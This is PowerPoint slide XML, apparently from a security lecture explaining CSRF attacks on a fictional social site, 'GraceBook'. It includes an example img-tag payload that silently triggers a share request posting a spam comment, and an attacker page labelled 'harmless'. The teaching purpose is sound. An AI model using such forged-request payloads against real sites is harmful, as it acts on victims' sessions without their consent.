            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 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4296664" y="450638"/>
            <a:ext cx="3601720" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-87" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-47" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="2142744"/>
            <a:ext cx="10103273" cy="2428079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" marR="309872" indent="-458035">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>JavaScript code can automatically </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>submit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>form </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-707" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>background</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to post </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>spam </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>GraceBook</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>feed.</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Simil</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>arl</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-213" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-1213" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>base</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>RF</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is also</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>po</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sible</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>. Making</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121"/>
            <a:r>
              <a:rPr sz="3200" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>equ</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ts is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>easi</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ju</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>im</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-1220" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ag</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>fic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s.</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="443642">
              <a:spcBef>
                <a:spcPts val="567"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;img</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>"http://</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ww.gracebook.com/share.php?text=SPAM%20COMMENT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="67" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs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2247" y="450638"/>
            <a:ext cx="4665980" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t>Attack</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064922" y="4321726"/>
            <a:ext cx="2053167" cy="994545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4233" algn="ctr">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>share.php</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="6773" indent="-847" algn="ctr">
              <a:spcBef>
                <a:spcPts val="53"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>update user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>status with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>spam </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-867" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2946401" y="3635756"/>
            <a:ext cx="6249247" cy="944880"/>
            <a:chOff x="2209800" y="2726817"/>
            <a:chExt cx="4686935" cy="70866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20" name="object 20"/>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1" name="object 21"/>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22" name="object 22"/>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text=SPAM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>COMMENT!</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4173305"/>
            <a:ext cx="2413000" cy="779780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1809750" h="584835">
                <a:moveTo>
                  <a:pt x="1809750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809750" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809750" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4173305"/>
            <a:ext cx="2413000" cy="688372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="44873" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2507"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="353"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2507"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="1600115"/>
            <a:ext cx="4978400" cy="1443567"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3876378" y="2099665"/>
            <a:ext cx="3837093" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Welcome </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>my</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>harmless</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>site!</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
